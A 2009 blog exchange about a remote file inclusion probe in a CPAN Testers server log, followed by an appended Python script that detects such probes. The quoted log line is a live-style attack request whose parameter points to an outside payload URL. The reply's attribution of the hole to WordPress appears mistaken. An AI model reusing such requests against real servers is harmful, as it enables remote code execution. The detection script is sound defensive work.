No PHP here, mate

barbie on 2009-07-13T14:42:59

I'm not sure whether this is amusing or embarrassing:

80.93.48.103 - - [13/Jul/2009:16:30:21 +0200] "GET /show//components/com_simpleboard/file_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 365 "-" "libwww-perl/5.803" 189 www.cpantesters.org

In case you're wondering, the above is an entry from the access logs on the CPAN Testers server. The script they are trying to access doesn't exist, and from what I can tell it's a poor attempt at crashing a server. The bit that amused me is that they're using LWP to run a PHP app. The bit that's embarrassing is that Perl is being used for undesirable purposes :(


Bog standard

Aristotle on 2009-07-14T01:51:25

That’s just an automated trying to exploit some known hole or other in WordPress. PHP’s require can load libraries from remote machines over HTTP, and many PHP programs use dynamic requires without sufficiently sanitising the input, resulting in holes exploitable in the way you see in your logs.

As for Perl being used for that purpose, eh, so what? If it wasn’t, it’d be wget, or something Python, or in Ruby, or in Java, or whatever.
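
An added example, not part of either post above: one way to pick requests like the logged one out of an access log is to flag any query parameter whose decoded value is itself a remote URL, and to record whether the server answered with an error or actually served the targeted script. The function name, field names and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache combined format; extra trailing fields (as in the entry above) are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# A parameter value that is itself a remote URL is the signature of an inclusion probe.
REMOTE_URL = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def find_rfi_probes(lines):
    """Return one finding per request whose query string carries a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line this pattern understands
        _, _, query = m['target'].partition('?')
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        hits = [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
                if REMOTE_URL.match(v)]
        if hits:
            status = int(m['status'])
            findings.append({
                'ip': m['ip'],
                'param': hits[0][0],
                'url': hits[0][1],
                'agent': m['agent'],
                'status': status,
                # 2xx/3xx means the targeted script exists: review it by hand
                'served': status < 400,
            })
    return findings


# Constructed sample lines (documentation addresses and hostnames).
SAMPLE = [
    '192.0.2.10 - - [13/Jul/2009:16:30:21 +0200] "GET /show//components/com_simpleboard/file_upload.php?sbp=http://files.example.net/blank.gif?? HTTP/1.1" 404 365 "-" "libwww-perl/5.803" 189 www.example.org',
    '192.0.2.11 - - [13/Jul/2009:16:31:02 +0200] "GET /index.php?page=http%3A%2F%2Ffiles.example.net%2Fx.txt HTTP/1.1" 200 5120 "-" "libwww-perl/5.803"',
    '198.51.100.7 - - [13/Jul/2009:16:32:40 +0200] "GET /search?q=perl+testers&page=2 HTTP/1.1" 200 8841 "http://www.example.org/" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in find_rfi_probes(SAMPLE):
        print(f['ip'], f['status'], 'SERVED' if f['served'] else 'rejected', f['param'], f['url'])
```

Findings with `served` set are the ones worth following up, since a 404 like the one in the quoted entry only shows the script was not there.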